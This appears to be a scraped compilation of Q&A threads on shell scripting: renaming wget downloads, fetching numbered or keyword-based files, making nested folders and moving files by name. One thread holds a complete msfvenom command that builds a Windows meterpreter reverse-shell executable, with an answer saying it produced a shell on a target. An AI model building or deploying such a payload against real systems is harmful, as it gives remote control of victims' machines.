wget - specify directory and rename the file - file

I'm trying to download multiple files and need to rename as I download, how can I do that and specify the directory I want them to download to? I know i need to be using -P and -O to do this but it does not seem to be working for me.

Ok it's too late to post my answer here but I'll correct #Bill's answer
If you read in "man wget" you will see the following
...
wget [option]... [URL]...
...
That is, common sense leads to realizing that
wget -O /directory_path/filename.file_format https://example.com
is the default that aligns with the wget documentation.
Remember: Just because it works doesn't mean it's right!

I ran into a similar situation and came across your question. I was able to get what I needed by writting a little bash script that parsed a file of urls in one column and the name in the 2nd.
This is the script I used for my particular requirement. Maybe it will give you some guidance if you still need help.
#!/bin/bash
FILE=URLhtmlPageWImagesWids.txt
while read line
do
F1=$(echo $line|cut -d " " -f1)
F2=$(echo $line|cut -d " " -f2)
wget -r -l1 --no-parent -A.jpg -O $F2.jpg $F1
done < $FILE
This won't work actually because -O combines all results into one page.
You could try using the --no-directories or --cut-dirs switch and in the loop process the files in the folder how you want to rename them.

wget your_url -O your_specify_dir/your_name

Like Bill was saying
wget http://example.com/original-filename -O /home/new_filename
worked for me !
Thanks

This may works for everyone
mkdir Download1
wget -O "Download1/test 10mb.zip" "http://www.speedtest.com.sg/test_random_10mb.zip"
You need to use " " for name with space.

I'm a little late to the party, but I just wrote a script to do this. You can check it out here: bulkGetter

Related

How can I download an array of files from a website? wget?

Let's say I want to download example.com/pics/0000.jpg through example.com/pics/9999.jpg.
What's the best way to do that?
I tried:
wget example.com/pics/{0000..9999].jpg
but it said "Argument list too long".
What's a good script or program I can use to do this?
I don't code much. I am thinking it will involve a shell script that uses wget to get 0000.jpg and then it will +1 to get the next picture, until it reaches 9999.jpg.
Thanks.
Here's a Bash one-liner that does what you want:
for n in $(seq -f "%04g" 0 9999); do wget http://example.com/pics/$n.jpg; done

Custom Payload Kali Linux

root#kali:~# msfvenom windows/meterpreter/reverse_tcp LHOST=192.168.49.128 LPORT=12345 -f exe
Attempting to read payload from STDIN...
You must select an arch for a custom payload
I've been googling for sometime now, with no positive result.
Can anyone tell me what is meant by 'You must select an arch for a custom payload'?
If you go to msfvenom -h it will bring up the help. You will see the command to set the architecture is '-a' which you need to set to x86 or any other architecture you want. so your command would look like
msfvenom windows/meterpreter/reverse_tcp LHOST=192.168.49.128 LPORT=12345 -a x86 -f exe > yourexploit.exe BUT you're gonna actually need to specify the payload by including '-p' in front of your payload description, so your command will look like msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.49.128 LPORT=12345 -a x86 -f exe > yourexploit.exe . It's gonna complain that no platform was selected so it selected one for you... "No platform was selected, choosing Msf::Module::Platform::Windows from the payload", then you'll get "Found 0 compatible encoders", just ignore that. Type in "file yourexploit.exe" and it should give you some data saying PE32 executable....then you're good to go. I just figured this out and it worked for me, ran the the .exe in my target and got reverse shell. Good luck!
It looks like you have copied the command of msfvenom from internet.
In your command -p is not actual -p(It is a issue related to Unicodes), Rewrite the -p with your own keyboard shall fix this.

Downloading file from online database using bash script

I want to download some files from an online database, but it does not allow me to download all the files at once. Instead it offers to download a file for a searched keyword. Because I have more than 20000 keywords, it's not feasible for me.
For example, I want to download whole information about miRNA-mRNA interaction from SarBase, but it does not offer an option to download all of them at once.
I wonder, how can I download it by writing some scripts. Can anybody help me?
Make a file called getdb.sh.
#!/bin/bash
echo "Download keywords in kw.txt."
for kw in $(cat kw.txt)
do
curl http://www.mirbase.org/cgi-bin/get_seq.pl?acc=$kw > $kw.txt
done
Create another file called kw.txt:
MI0000342
MI0000343
MI0000344
Then run this
$ chmod +x getdb.sh
$ ./getdb.sh
Download keywords in kw.txt.
$ ls -1 *.txt
kw.txt
MI0000342.txt
MI0000343.txt
MI0000344.txt
another way
cat kw.txt |xargs -i curl -o {}.txt http://www.mirbase.org/cgi-bin/get_seq.pl?acc={}

Fastest way to create 1000 folders one inside another and put a file in the last folder

I've written a code for searching a specific file , where the user enters a starting path and a filename , and then the program prints its details if the file exists , or prints not found otherwise.
The code is based on recursion . I want to test it with a large folder hierarchy , let's say 1000 folders , one inside the other , and put a file called david.txt inside the 1000th folder .
How can I do that without creating 1000 times folders for the next 3 hours ?
The code is written in C , under Ubuntu .
Thanks
Type the following in your shell:
mkdir -p folder$( seq -s "/folder" 999 )1000
Then you can enter this folder:
cd folder$( seq -s "/folder" 999 )1000
and create a file:
touch david.txt
and come back to your previous dir:
cd -
As some comments described, I would use the shell for such purposes:
#!/bin/sh
for i in $(seq 1000)
do
mkdir tst
cd tst
done
touch david.txt
On a related topic, let me suggest this article, which shows how sometimes shell scripting can solve your problems in much less development time. Specially for ad-hoc problems like this one.
Simple bash loop:
$ pushd .
$ for i in {1..1000}; do
mkdir d$i;
cd d$i;
done
$ touch david.txt
$ popd
Use the same code, (almost), to create the folders and files. Once that is working, the searching/reporting is almost done as well. It's sorta self-testing :)

Moving things in terminal based on their name

Edit: I think this has been answered successfully, but I can't check 'til later. I've reformatted it as suggested though.
The question: I have a series of files, each with a name of the form XXXXNAME, where XXXX is some number. I want to move them all to separate folders called XXXX and have them called NAME. I can do this manually, but I was hoping that by naming them XXXXNAME there'd be some way I could tell Terminal (I think that's the right name, but not really sure) to move them there. Something like
mv *NAME */NAME
but where it takes whatever * was in the first case and regurgitates it to the path.
This is on some form of Linux, with a bash shell.
In the real life case, the files are 0000GNUmakefile, with sequential numbering. I'm having to make lots of similar-but-slightly-altered versions of a program to compile and run on a cluster as part of my research. It would probably have been quicker to write a program to edit all the files and put in the right place in the first place, but I didn't.
This is probably extremely simple, and I should be able to find an answer myself, if I knew the right words. Thing is, I have no formal training in programming, so I don't know what to call things to search for them. So hopefully this will result in me getting an answer, and maybe knowing how to find out the answer for similar things myself next time. With the basic programming I've picked up, I'm sure I could write a program to do this for me, but I'm hoping there's a simple way to do it just using functionality already in Terminal. I probably shouldn't be allowed to play with these things.
Thanks for any help! I can actually program in C and Python a fair amount, but that's through trial and error largely, and I still don't know what I can do and can't do in Terminal.
SO many ways to achieve this.
I find that the old standbys sed and awk are often the most powerful.
ls | sed -rne 's:^([0-9]{4})(NAME)$:mv -iv & \1/\2:p'
If you're satisfied that the commands look right, pipe the command line through a shell:
ls | sed -rne 's:^([0-9]{4})(NAME)$:mv -iv & \1/\2:p' | sh
I put NAME in brackets and used \2 so that if it varies more than your example indicates, you can come up with a regular expression to handle your filenames better.
To do the same thing in gawk (GNU awk, the variant found in most GNU/Linux distros):
ls | gawk '/^[0-9]{4}NAME$/ {printf("mv -iv %s %s/%s\n", $1, substr($0,0,4), substr($0,5))}'
As with the first sample, this produces commands which, if they make sense to you, can be piped through a shell by appending | sh to the end of the line.
Note that with all these mv commands, I've added the -i and -v options. This is for your protection. Read the man page for mv (by typing man mv in your Linux terminal) to see if you should be comfortable leaving them out.
Also, I'm assuming with these lines that all your directories already exist. You didn't mention if they do. If they don't, here's a one-liner to create the directories.
ls | sed -rne 's:^([0-9]{4})(NAME)$:mkdir -p \1:p' | sort -u
As with the others, append | sh to run the commands.
I should mention that it is generally recommended to use constructs like for (in Tim's answer) or find instead of parsing the output of ls. That said, when your filename format is as simple as /[0-9]{4}word/, I find the quick sed one-liner to be the way to go.
Lastly, if by NAME you actually mean "any string of characters" rather than the literal string "NAME", then in all my examples above, replace NAME with .*.
The following script will do this for you. Copy the script into a file on the remote machine (we'll call it sortfiles.sh).
#!/bin/bash
# Get all files in current directory having names XXXXsomename, where X is an integer
files=$(find . -name '[0-9][0-9][0-9][0-9]*')
# Build a list of the XXXX patterns found in the list of files
dirs=
for name in ${files}; do
dirs="${dirs} $(echo ${name} | cut -c 3-6)"
done
# Remove redundant entries from the list of XXXX patterns
dirs=$(echo ${dirs} | uniq)
# Create any XXXX directories that are not already present
for name in ${dirs}; do
if [[ ! -d ${name} ]]; then
mkdir ${name}
fi
done
# Move each of the XXXXsomename files to the appropriate directory
for name in ${files}; do
mv ${name} $(echo ${name} | cut -c 3-6)
done
# Return from script with normal status
exit 0
From the command line, do chmod +x sortfiles.sh
Execute the script with ./sortfiles.sh
Just open the Terminal application, cd into the directory that contains the files you want moved/renamed, and copy and paste these commands into the command line.
for file in [0-9][0-9][0-9][0-9]*; do
dirName="${file%%*([^0-9])}"
mkdir -p "$dirName"
mv "$file" "$dirName/${file##*([0-9])}"
done
This assumes all the files that you want to rename and move are in the same directory. The file globbing also assumes that there are at least four digits at the start of the filename. If there are more than four numbers, it will still be caught, but not if there are less than four. If there are less than four, take off the appropriate number of [0-9]s from the first line.
It does not handle the case where "NAME" (i.e. the name of the new file you want) starts with a number.
See this site for more information about string manipulation in bash.

Resources